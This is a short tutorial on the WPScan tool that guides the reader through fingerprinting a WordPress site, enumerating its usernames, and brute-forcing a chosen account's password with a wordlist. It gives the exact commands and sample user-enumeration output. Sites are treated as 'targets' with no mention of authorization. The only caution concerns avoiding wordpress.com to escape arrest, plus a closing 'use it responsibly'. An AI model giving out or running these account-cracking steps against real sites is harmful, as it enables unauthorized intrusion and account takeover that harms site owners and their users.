This tutorial teaches you how to use wpscan. If you’re here then you already know what it is and I don’t need to go into detail what it does! Let’s get started.

First of all you need to find a site that is running on WordPress. Now, there is something you need to understand before starting. There are two ways to host a word press site, the first is as a sub-domain of worpress.com so the users site address will be MySite.wordpress.com. This is no good. If you try to enumerate the users from this it wont work. Or you will get the following results:

[+] We found the following 5 user/s:
+—-+———–+——————————+
| Id | Login | Name |
+—-+———–+——————————+
| 1 | admin | 301 Moved |
| 2 | donncha | Donncha |
| 5 | matt | 301 Moved |
| 7 | 7 | Anthony |
| 9 | ian | Ian McKellar |
+—-+———–+——————————+
As much as i looks like you might have just pulled all the usernames from your target site… you haven’t. What you’ve actually done is pull the usernames from wordpress.com and i wouldn’t advise going any further targeting that domain. Unless you want to get a knock at the door by some people holding some handcuffs.

Anyway, the sites you want to target are the ones that are on a stand alone server.

So the first thing you will want to do is make sure it’s a wordpress site.

Type the following:

ruby ./wpscan.rb –url www.DomainName.com

This will scan the site and providing you don’t get an error then you’re in business.

Now the next thing you want to do is find out what the admin account username is. To do that type:

ruby ./wpscan.rb –url www.DomainName.com –enumerate u

This will give you a list of the registered users on your target site. Select a user you want to target and move onto the next step.

Now to start attacking the username of your choice type the following: (you will need a pasword list for this. You can try searching for one on the internet to get you started.

ruby ./ wpscan.rb –url www.DomainName.com –wordlist passwords.lst –username Username

The software will get to work on cracking the users account and will let you know as soon as it’s found the correct password. This could take some time so let it run in the background and go back to check it periodically.

This tutorial is only a fraction of what the software can do, so i suggest you type the following command to find what else it can do.

ruby ./wpscan.rb –help

Good luck with this great tool. Please use it responsibly!